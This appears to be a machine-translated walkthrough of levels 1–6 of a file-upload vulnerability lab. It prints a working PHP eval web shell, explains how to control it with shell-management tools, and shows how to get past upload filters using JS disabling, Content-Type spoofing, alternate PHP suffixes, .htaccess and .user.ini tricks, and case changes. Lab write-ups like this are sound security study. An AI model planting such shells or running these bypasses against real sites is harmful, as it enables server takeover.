In a word, Trojans

   <?php @eval($_POST['x']);?>

The basic principle ： Exploit file upload vulnerability , Upload a sentence to the target website , Then you can get and control the whole website directory locally through Chinese kitchen knife or ant sword . Indicates that even if the execution error occurs later , Don't complain .

analysis ：

<?php  >  Basic framework

@ The symbol means no error , Even if the execution is wrong , Don't complain .

The password for x  reason ：

php There are several super global variables ：$_GET、$_POST Is one of them .$_POST['a']; It means    yes a This variable , use post The method of receiving .

eval Usefulness ：

eval() Take the string as PHP Code execution .

for example ：eval("echo 'a'"); It is equal to direct echo 'a';

          Look again. <?php eval($_POST['pw']); ?> First , use post Way to receive variables pw, For example, I received ：pw=echo 'a'; Then the code becomes <?php eval("echo 'a';"); ?> Connecting means ： use post Method to receive variables pw, Put variables pw The string inside is used as php Code to execute . in other words , What code do you want to execute , Just put what code into the variable pw in , use post Transfer to one sentence Trojan horse .

After uploading successfully, you can pass Ant sword or kitchen knife connection

pass-1

Check the source code and find that it is the front end JS check Directly to disable js

Upload directly after disabling Trojan files

Make x=phpinfo（）     （ Used to display php Some information ）

pass-2

  The second level is back-end detection You can't use the method of the previous level   Need to use burp Grab the bag Change file type

Content-Type： Also called Internet media type （Internet Media Type） perhaps MIME type ,

stay HTTP In the protocol header , It is used to represent the media type information in the specific request .

for example ：text/html representative HTML Format image/gif representative GIF picture Image/png representative GIF picture application/octet-stream Binary stream , I don't know the file type （PHP）application/json representative JSON type             ------ train ppt

Grab the bag

Change file type

Pack

Upload successful

pass-3

Blacklist bypasses

No upload asp....php Suffix file    But the blacklist is not complete You can pass through some abnormal suffixes php1、php2、php3、php4、php5、php7、pht、phtml、 phar、 phps、Asp、aspx、cer、cdx、asa、asax、jsp、jspa、jspx etc.    

Change the suffix to .php3

Prerequisite pache Of httpd.conf There are configuration codes AddType application/x-httpd-php .pht .phtml .phps .php5 .pht

pass-4

You can see that uploading malformed suffixes is forbidden    

You can upload .htaccess    SetHandler application/x-httpd-php

You can parse any file form into php

Upload .htaccess after   Change the suffix of the Trojan horse to .jpg Upload    You can succeed

pass-5

Observe the source code

It is found that not only abnormal suffixes are disabled It's also disabled .htaccess

So none of the above methods can    View source code tips

You can use .ini do

user.ini ： since PHP 5.3.0 rise ,PHP Support per directory .htaccess Style INI file . Such files are only
   CGI／FastCGI SAPI Handle . This feature makes PECL Of htscanner Extended void . If you use Apache, Then use
   .htaccess Files have the same effect .
   
   Except for the Lord php.ini outside ,PHP It's also scanned in every directory INI file , From the executed PHP The directory where the file is located begins to rise to web
   root directory （$_SERVER['DOCUMENT_ROOT'] As specified by the ）. If it's executed PHP The file in web Outside the root directory , Only the directory is scanned .
   
   stay .user.ini Style INI Only in the file has PHP_INI_PERDIR and PHP_INI_USER Mode INI
   Settings can be recognized .
   
   Two new INI Instructions ,user_ini.filename and user_ini.cache_ttl Controlling users INI The use of documents .
   
   user_ini.filename Set the PHP The file name that will be searched in each directory ; If set to an empty string, then PHP No search . The default value is
   .user.ini.
   
   user_ini.cache_ttl Controls the re reading of users INI Time between files . The default is 300 second （5 minute ）.

                                                                       ———————— Baidu

php.ini yes php Configuration file for ,.user.ini The fields in will also be php Treat as a configuration file , Which leads to php File parsing vulnerability .

So first create a user.ini file

.user.ini The document means ： be-all php All files automatically contain 721.jpg file ..user.ini Equivalent to a user-defined php.ini

Then upload 721.jpg file , The content of the document is ：<?php @eval($_POST['x721]);?>

Upload completed successfully .

pass-6

View source code    

Compared with the previous question   Disabled .ini    But it's not used strtolower() function , You can use case to bypass the blacklist

Change the file suffix to .Php   upload